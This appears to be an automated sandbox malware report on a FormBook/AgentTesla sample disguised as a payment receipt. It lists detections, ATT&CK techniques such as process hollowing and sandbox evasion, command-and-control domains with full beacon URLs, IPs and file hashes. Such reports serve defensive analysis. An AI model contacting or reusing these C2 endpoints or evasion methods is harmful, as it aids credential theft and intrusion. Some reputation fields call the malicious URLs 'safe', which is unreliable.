Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match | File source: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.263189244.0000000000F10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.491351261.00000000035F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.491250685.00000000035C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.263151938.0000000000EE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.233139122.00000000033B9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 1.2.Final-Payment-Receipt.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.Final-Payment-Receipt.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

Yara detected FormBook
Source: Yara match | File source: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.263189244.0000000000F10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.491351261.00000000035F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.491250685.00000000035C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.263151938.0000000000EE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.233139122.00000000033B9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 1.2.Final-Payment-Receipt.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.Final-Payment-Receipt.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Shared Modules1 | Path Interception | Process Injection612 | Rootkit1 | Credential API Hooking1 | Security Software Discovery221 | Remote Services | Credential API Hooking1 | Exfiltration Over Other Network Medium | Encrypted Channel1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Masquerading1 | LSASS Memory | Virtualization/Sandbox Evasion3 | Remote Desktop Protocol | Archive Collected Data1 | Exfiltration Over Bluetooth | Ingress Tool Transfer3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion3 | Security Account Manager | Process Discovery2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Disable or Modify Tools1 | NTDS | Remote System Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol3 | SIM Card Swap | Carrier Billing Fraud | -
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Process Injection612 | LSA Secrets | System Information Discovery112 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | -
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Deobfuscate/Decode Files or Information1 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features | -
External Remote Services | Scheduled Task | Startup Items | Startup Items | Obfuscated Files or Information4 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact | -
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Software Packing3 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue | -

          Behavior Graph

Behavior Graph ID: 320833 | Sample: Final-Payment-Receipt.exe | Startdate: 19/11/2020 | Architecture: WINDOWS | Score: 100
Graph-level DNS/IP: g.msn.com
Graph-level signatures: Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; Yara detected AntiVM_3; 5 other signatures
Final-Payment-Receipt.exe 3 (started)
    dropped: C:\Users\...\Final-Payment-Receipt.exe.log, ASCII
    signatures: Tries to detect virtualization through RDTSC time measurements; Injects a PE file into a foreign processes
    Final-Payment-Receipt.exe (started)
        signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
        explorer.exe (injected)
            DNS/IP: www.wacrox.com 162.0.236.49, 49730, 80 NAMECHEAP-NETUS Canada; trumpingitagain.com 27.123.27.33, 49731, 80 DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU Australia; 4 other IPs or domains
            signatures: System process connects to network (likely due to code injection or exploit)
            wlanext.exe (started)
                signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                cmd.exe 1 (started)
                    conhost.exe (started)


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

Source | Detection | Scanner | Label
Final-Payment-Receipt.exe | 34% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla
Final-Payment-Receipt.exe | 100% | Joe Sandbox ML | -

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

Source | Detection | Scanner | Label
1.2.Final-Payment-Receipt.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          No Antivirus matches

          URLs

Source | Detection | Scanner | Label
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
https://themindofafunnygirl.com/71m/?Rzr0iD=rhJBnfA/e5RktQ98 | 0% | Avira URL Cloud | safe
http://www.wacrox.com/71m/?Rzr0iD=xuMbXRqvcjTkPYem20N3vsgWyUob49TNzNry+QjPYNTyHJJexkEaphWMorU+NKluO0/a&ZL3=rVvxt090-21lhr | 0% | Avira URL Cloud | safe
http://www.trumpingitagain.com/71m/?Rzr0iD=gir/TGf45q640hyvaYoOLmcQvbxfbyF+CK0IasCqTcsJdBCY+OvZ/ZhMnEHJcPXMDgdk&ZL3=rVvxt090-21lhr | 0% | Avira URL Cloud | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.themindofafunnygirl.com/71m/?Rzr0iD=rhJBnfA/e5RktQ98+ow2gk+rbfXq49mIcD+nNtl3IG/t9WffOOBTTAV63Ad5zEG8kC/4&ZL3=rVvxt090-21lhr | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.sakkal.com | 0% | URL Reputation | safe

          Domains and IPs

          Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.wacrox.com | 162.0.236.49 | true | true | - | unknown
themindofafunnygirl.com | 192.0.78.230 | true | true | - | unknown
trumpingitagain.com | 27.123.27.33 | true | true | - | unknown
g.msn.com | unknown | unknown | false | - | high
www.themindofafunnygirl.com | unknown | unknown | true | - | unknown
www.azarblock.com | unknown | unknown | true | - | unknown
www.trumpingitagain.com | unknown | unknown | true | - | unknown

                        Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.wacrox.com/71m/?Rzr0iD=xuMbXRqvcjTkPYem20N3vsgWyUob49TNzNry+QjPYNTyHJJexkEaphWMorU+NKluO0/a&ZL3=rVvxt090-21lhr | true | Avira URL Cloud: safe | unknown
http://www.trumpingitagain.com/71m/?Rzr0iD=gir/TGf45q640hyvaYoOLmcQvbxfbyF+CK0IasCqTcsJdBCY+OvZ/ZhMnEHJcPXMDgdk&ZL3=rVvxt090-21lhr | true | Avira URL Cloud: safe | unknown
http://www.themindofafunnygirl.com/71m/?Rzr0iD=rhJBnfA/e5RktQ98+ow2gk+rbfXq49mIcD+nNtl3IG/t9WffOOBTTAV63Ad5zEG8kC/4&ZL3=rVvxt090-21lhr | true | Avira URL Cloud: safe | unknown

                        URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.apache.org/licenses/LICENSE-2.0 | explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp | false | - | high
http://www.fontbureau.com | explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp | false | - | high
http://www.fontbureau.com/designersG | explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp | false | - | high
http://www.fontbureau.com/designers/? | explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp | false | - | high
http://www.founder.com.cn/cn/bThe | explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
https://themindofafunnygirl.com/71m/?Rzr0iD=rhJBnfA/e5RktQ98 | wlanext.exe, 00000003.00000002.492344982.00000000041AF000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers? | explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp | false | - | high
http://www.tiro.com | explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp | false | - | high
http://www.goodfont.co.kr | explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.carterandcone.coml | explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com | explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp | false | - | high
http://www.founder.com.cn/cn/cThe | explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://fontfabrik.com | explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn | explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-jones.html | explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp | false | - | high
http://www.jiyu-kobo.co.jp/ | explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/DPlease | explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers8 | explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp | false | - | high
http://www.fonts.com | explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp | false | - | high
http://www.sandoll.co.kr | explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.deDPlease | explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | Final-Payment-Receipt.exe, 00000000.00000002.232733869.00000000023B1000.00000004.00000001.sdmp | false | - | high
http://www.sakkal.com | explorer.exe, 00000002.00000000.247061311.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown

                                              Contacted IPs


                                              Public

IP | Domain | Country | ASN | ASN Name | Malicious
27.123.27.33 | unknown | Australia | 38719 | DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU | true
192.0.78.230 | unknown | United States | 2635 | AUTOMATTICUS | true
162.0.236.49 | unknown | Canada | 22612 | NAMECHEAP-NETUS | true

                                              General Information

                                              Joe Sandbox Version:31.0.0 Red Diamond
                                              Analysis ID:320833
                                              Start date:19.11.2020
                                              Start time:22:18:38
                                              Joe Sandbox Product:CloudBasic
                                              Overall analysis duration:0h 9m 8s
                                              Hypervisor based Inspection enabled:false
                                              Report type:light
                                              Sample file name:Final-Payment-Receipt.exe
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                              Number of analysed new started processes analysed:22
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:1
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • HDC enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Detection:MAL
                                              Classification:mal100.troj.evad.winEXE@7/1@5/3
                                              EGA Information:Failed
                                              HDC Information:
                                              • Successful, ratio: 10% (good quality ratio 9.2%)
                                              • Quality average: 75.1%
                                              • Quality standard deviation: 30.2%
                                              HCA Information:
                                              • Successful, ratio: 97%
                                              • Number of executed functions: 0
                                              • Number of non-executed functions: 0
                                              Cookbook Comments:
                                              • Adjust boot time
                                              • Enable AMSI
                                              • Found application associated with file extension: .exe
                                              Warnings:
                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                              • Excluded IPs from analysis (whitelisted): 23.210.248.85, 51.11.168.160, 40.88.32.150, 20.54.26.129, 52.230.222.68, 2.20.142.210, 2.20.142.209, 52.142.114.176, 92.122.213.194, 92.122.213.247, 51.104.144.132
                                              • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wns.notify.windows.com.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, g-msn-com-nsatc.trafficmanager.net, skypedataprdcoleus15.cloudapp.net, par02p.wns.notify.windows.com.akadns.net, emea1.notify.windows.com.akadns.net, audownload.windowsupdate.nsatc.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, dm3p.wns.notify.windows.com.akadns.net, client.wns.windows.com, fs.microsoft.com, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, ris.api.iris.microsoft.com, umwatsonrouting.trafficmanager.net

                                              Simulations

                                              Behavior and APIs

                                              Time:22:19:29
                                              Type:API Interceptor
                                              Description:1x Sleep call for process: Final-Payment-Receipt.exe modified

                                              Joe Sandbox View / Context

                                              IPs

                                              No context

                                              Domains

                                              No context

                                              ASN


                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Final-Payment-Receipt.exe.log
                                              Process:C:\Users\user\Desktop\Final-Payment-Receipt.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):1314
                                              Entropy (8bit):5.350128552078965
                                              Encrypted:false
                                              SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                              MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
                                              SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                              SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                              SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                              Malicious:true
                                              Reputation:high, very likely benign file
                                              Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                              Static File Info

                                              General

                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Entropy (8bit):7.806563272516785
                                              TrID:
                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                              • Win32 Executable (generic) a (10002005/4) 49.75%
                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                              • Windows Screen Saver (13104/52) 0.07%
                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                              File name:Final-Payment-Receipt.exe
                                              File size:552448
                                              MD5:8f5d29001a9f5d4f62b47af6442be5ab
                                              SHA1:4838464ffe421aad7c9d73ba19420b7e9c2c427d
                                              SHA256:8e01fb320ffa60c0157bfc9aa8c6de43a7802d7f408de907a0d6338ce25c239c
                                              SHA512:8457a4d90e4777439aa5415d656535a6701428919981885ffd2a9fd82b7be8f0e5dff2d206f74aadef358b5988fc805e910f5da18d99f681efde918d2ed93302
                                              SSDEEP:12288:FE2YwhOTAtvmsADL5L3cAHczt8W+GKOfbn78g:FXD8ktmsMLMBPj78g
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......_..............P..d............... ........@.. ....................................@................................

                                              File Icon

                                              Icon Hash:00828e8e8686b000

                                              Static PE Info

                                              General

                                              Entrypoint:0x4882da
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                              DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                              Time Stamp:0x5FB5D6C8 [Thu Nov 19 02:22:00 2020 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:v4.0.30319
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                              Entrypoint Preview

                                              Instruction
                                              jmp dword ptr [00402000h]

                                              Data Directories

                                              Name                                  Virtual Address  Virtual Size  Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT          0x88288          0x4f          .text
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE        0x8a000          0x59c         .rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC       0x8c000          0xc           .reloc
                                              IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                              IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                              IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
                                              IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

                                              Sections

                                              Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy         Characteristics
                                              .text   0x2000           0x862e0       0x86400   False     0.871959380819   data       7.8171947974    IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                              .rsrc   0x8a000          0x59c         0x600     False     0.419270833333   data       4.06876160117   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .reloc  0x8c000          0xc           0x200     False     0.044921875      data       0.101910425663  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                              Resources

                                              Name         RVA      Size   Type                                                                        Language  Country
                                              RT_VERSION   0x8a090  0x30c  data
                                              RT_MANIFEST  0x8a3ac  0x1ea  XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                              Imports

                                              DLL          Import
                                              mscoree.dll  _CorExeMain

                                              Version Infos

                                              Description       Data
                                              Translation       0x0000 0x04b0
                                              LegalCopyright    Copyright 2014
                                              Assembly Version  1.0.0.0
                                              InternalName      F5NI.exe
                                              FileVersion       1.0.0.0
                                              CompanyName
                                              LegalTrademarks
                                              Comments
                                              ProductName       Blackjack
                                              ProductVersion    1.0.0.0
                                              FileDescription   Blackjack
                                              OriginalFilename  F5NI.exe

                                              Network Behavior

                                              Network Port Distribution

                                              TCP Packets

                                              Timestamp                            Source Port  Dest Port  Source IP     Dest IP
                                              Nov 19, 2020 22:20:26.977325916 CET  49730        80         192.168.2.5   162.0.236.49
                                              Nov 19, 2020 22:20:27.148660898 CET  80           49730      162.0.236.49  192.168.2.5
                                              Nov 19, 2020 22:20:27.148916006 CET  49730        80         192.168.2.5   162.0.236.49
                                              Nov 19, 2020 22:20:27.149298906 CET  49730        80         192.168.2.5   162.0.236.49
                                              Nov 19, 2020 22:20:27.322042942 CET  80           49730      162.0.236.49  192.168.2.5
                                              Nov 19, 2020 22:20:27.391788006 CET  80           49730      162.0.236.49  192.168.2.5
                                              Nov 19, 2020 22:20:27.391809940 CET  80           49730      162.0.236.49  192.168.2.5
                                              Nov 19, 2020 22:20:27.392299891 CET  49730        80         192.168.2.5   162.0.236.49
                                              Nov 19, 2020 22:20:27.392466068 CET  49730        80         192.168.2.5   162.0.236.49
                                              Nov 19, 2020 22:20:27.564534903 CET  80           49730      162.0.236.49  192.168.2.5
                                              Nov 19, 2020 22:20:47.666982889 CET  49731        80         192.168.2.5   27.123.27.33
                                              Nov 19, 2020 22:20:47.953485966 CET  80           49731      27.123.27.33  192.168.2.5
                                              Nov 19, 2020 22:20:47.953649044 CET  49731        80         192.168.2.5   27.123.27.33
                                              Nov 19, 2020 22:20:47.953753948 CET  49731        80         192.168.2.5   27.123.27.33
                                              Nov 19, 2020 22:20:48.240211010 CET  80           49731      27.123.27.33  192.168.2.5
                                              Nov 19, 2020 22:20:48.246388912 CET  80           49731      27.123.27.33  192.168.2.5
                                              Nov 19, 2020 22:20:48.246455908 CET  80           49731      27.123.27.33  192.168.2.5
                                              Nov 19, 2020 22:20:48.246592045 CET  49731        80         192.168.2.5   27.123.27.33
                                              Nov 19, 2020 22:20:48.246659994 CET  49731        80         192.168.2.5   27.123.27.33
                                              Nov 19, 2020 22:20:48.533060074 CET  80           49731      27.123.27.33  192.168.2.5
                                              Nov 19, 2020 22:21:28.858830929 CET  49733        80         192.168.2.5   192.0.78.230
                                              Nov 19, 2020 22:21:28.875322104 CET  80           49733      192.0.78.230  192.168.2.5
                                              Nov 19, 2020 22:21:28.875430107 CET  49733        80         192.168.2.5   192.0.78.230
                                              Nov 19, 2020 22:21:28.875543118 CET  49733        80         192.168.2.5   192.0.78.230
                                              Nov 19, 2020 22:21:28.891885996 CET  80           49733      192.0.78.230  192.168.2.5
                                              Nov 19, 2020 22:21:28.891923904 CET  80           49733      192.0.78.230  192.168.2.5
                                              Nov 19, 2020 22:21:28.891963005 CET  80           49733      192.0.78.230  192.168.2.5
                                              Nov 19, 2020 22:21:28.892087936 CET  49733        80         192.168.2.5   192.0.78.230
                                              Nov 19, 2020 22:21:28.892112970 CET  49733        80         192.168.2.5   192.0.78.230
                                              Nov 19, 2020 22:21:28.908574104 CET  80           49733      192.0.78.230  192.168.2.5

                                              UDP Packets

                                              Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                              Nov 19, 2020 22:19:48.428203106 CET | 60151 | 53 | 192.168.2.5 | 8.8.8.8
                                              Nov 19, 2020 22:19:48.464210033 CET | 53 | 60151 | 8.8.8.8 | 192.168.2.5
                                              Nov 19, 2020 22:19:48.984335899 CET | 56969 | 53 | 192.168.2.5 | 8.8.8.8
                                              Nov 19, 2020 22:19:49.011492014 CET | 53 | 56969 | 8.8.8.8 | 192.168.2.5
                                              Nov 19, 2020 22:19:53.932404995 CET | 55161 | 53 | 192.168.2.5 | 8.8.8.8
                                              Nov 19, 2020 22:19:53.959470987 CET | 53 | 55161 | 8.8.8.8 | 192.168.2.5
                                              Nov 19, 2020 22:19:54.611696005 CET | 54757 | 53 | 192.168.2.5 | 8.8.8.8
                                              Nov 19, 2020 22:19:54.638799906 CET | 53 | 54757 | 8.8.8.8 | 192.168.2.5
                                              Nov 19, 2020 22:19:55.486553907 CET | 49992 | 53 | 192.168.2.5 | 8.8.8.8
                                              Nov 19, 2020 22:19:55.522375107 CET | 53 | 49992 | 8.8.8.8 | 192.168.2.5
                                              Nov 19, 2020 22:19:56.195149899 CET | 60075 | 53 | 192.168.2.5 | 8.8.8.8
                                              Nov 19, 2020 22:19:56.222517014 CET | 53 | 60075 | 8.8.8.8 | 192.168.2.5
                                              Nov 19, 2020 22:20:09.431056976 CET | 55016 | 53 | 192.168.2.5 | 8.8.8.8
                                              Nov 19, 2020 22:20:09.474910021 CET | 53 | 55016 | 8.8.8.8 | 192.168.2.5
                                              Nov 19, 2020 22:20:13.863044024 CET | 64345 | 53 | 192.168.2.5 | 8.8.8.8
                                              Nov 19, 2020 22:20:13.898453951 CET | 53 | 64345 | 8.8.8.8 | 192.168.2.5
                                              Nov 19, 2020 22:20:13.982206106 CET | 57128 | 53 | 192.168.2.5 | 8.8.8.8
                                              Nov 19, 2020 22:20:14.009272099 CET | 53 | 57128 | 8.8.8.8 | 192.168.2.5
                                              Nov 19, 2020 22:20:15.341979980 CET | 54791 | 53 | 192.168.2.5 | 8.8.8.8
                                              Nov 19, 2020 22:20:15.368985891 CET | 53 | 54791 | 8.8.8.8 | 192.168.2.5
                                              Nov 19, 2020 22:20:17.573630095 CET | 50463 | 53 | 192.168.2.5 | 8.8.8.8
                                              Nov 19, 2020 22:20:17.624994993 CET | 53 | 50463 | 8.8.8.8 | 192.168.2.5
